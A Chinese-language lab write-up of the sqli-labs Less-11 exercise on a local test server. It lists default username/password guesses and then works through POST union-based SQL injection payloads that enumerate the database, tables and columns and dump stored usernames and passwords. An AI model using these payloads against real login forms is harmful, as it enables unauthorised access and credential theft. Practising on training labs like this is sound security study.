尝试简单的账号和密码
root,root
admin,admin
123456,123456
root,admin
admin,root
admin,123456
root,123456
发现admin,admin就能登进去但是纯属巧合
还是正经尝试sql注入
2.尝试sql注入
http://127.0.0.1:8081/Less-11/?id=1
http://127.0.0.1:8081/Less-11/?id=1 and 1=1
http://127.0.0.1:8081/Less-11/?id=1 and 1=2
这个输进去都是Welcome Dhakkan
没有变化
尝试单引号,双引号,字符型这种
http://127.0.0.1:8081/Less-11/?id=1'
http://127.0.0.1:8081/Less-11/?id=1' and '1'='1
http://127.0.0.1:8081/Less-11/?id=1' and '1'='1
Welcome Dhakkan
http://127.0.0.1:8081/Less-11/?id=1"
http://127.0.0.1:8081/Less-11/?id=1" and "1"="1
http://127.0.0.1:8081/Less-11/?id=1" and "1"="1
Welcome Dhakkan
那么应该就是尝试get或者是post进行传参可以去检查一下是不是满足我设想的思路发现:源码如图所示,满足我的思路
发现了uname和passwd都上了单引号,并且使用的是post传参,那么就可以使用bp或者hackbar来进行post传参
3.先使用bp来尝试传参吧
输入uname:1,passwd:1,再index.php输入echo sql,让sql语句显示出来更方便我们进行sql注入
4.找列数得到列数为2
5.联合查询找到,your login name:1,your password:2
6.sql的注入来查找数据库,user,id,password啥的进行尝试
uname=1' union select 1, database()--+ &passwd=1&submit=Submit
database():security
最后:
database():security
user():root@localhost
version():5.7.26
@@version_compile_os:Win64
然后去数据库里找表名,用户名,密码
6.uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1 --+ &passwd=1&submit=Submit
在这里发现了users表
然后去查列
uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security'--+ &passwd=1&submit=Submit
然后去找password和username
uname=1' union select group_concat(username),group_concat(password) from users--+ &passwd=1&submit=Submit
uname=1' union select group_concat(username),group_concat(password) from users limit 0,1--+ &passwd=1&submit=Submit
7.最后尝试登录
Your Login name:admin2
Your Password:admin2
Your Login name:admin1
Your Password:admin1
8.尝试去hackbar尝试得到数据
收工收工